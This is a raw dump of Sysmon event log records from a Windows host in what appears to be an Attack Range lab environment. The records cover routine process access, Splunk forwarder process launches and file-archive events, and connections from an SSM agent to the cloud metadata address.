10341000x80000000000000009870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.001{266CAFBE-64C5-6064-A500-00000000AE01}43566732C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.001{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+
1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:05.579{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDA30519DFEF499378E04DC6C3FC30E3,SHA256=4AFCA92042F7FF1C9FE70533974043670F6F00DEB788BACF635E2A8B3DC84268,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.399{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53651-false169.254.169.254-80http 354300x80000000000000009926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.267{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53650-false169.254.169.254-80http 354300x80000000000000009925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.216{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53649-false169.254.169.254-80http 354300x80000000000000009924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.213{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53648-false169.254.169.254-80http 10341000x80000000000000009938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:06.656{266CAFBE-65AE-6064-5301-00000000AE01}39524316C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:06.594{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACF6DFB0B72455840538463D0049079F,SHA256=DB28A0D2837E8D3E51E2892C4D31C378ACA721E49F558330FA581F54B6A31AB6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:06.485{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65AE-6064-5301-00000000AE01}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:06.485{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:06.485{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:06.485{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:06.485{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-65AE-6064-5301-00000000AE01}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:06.485{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:06.485{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65AE-6064-5301-00000000AE01}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:06.345{266CAFBE-65AE-6064-5301-00000000AE01}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.922{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65AF-6064-5501-00000000AE01}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:07.922{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.922{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:07.922{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.922{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.922{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-65AF-6064-5501-00000000AE01}6608C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.922{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65AF-6064-5501-00000000AE01}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.782{266CAFBE-65AF-6064-5501-00000000AE01}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000009948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.594{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E077CC85DBCF75F42874FFA2490B2F1,SHA256=43E2277C8DB801C219726F183482DF888A909F83EBEDBCB67F553AB7B9ED2D20,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.328{266CAFBE-65AF-6064-5401-00000000AE01}55006008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.156{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65AF-6064-5401-00000000AE01}5500C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.156{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:07.156{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.156{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:07.156{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 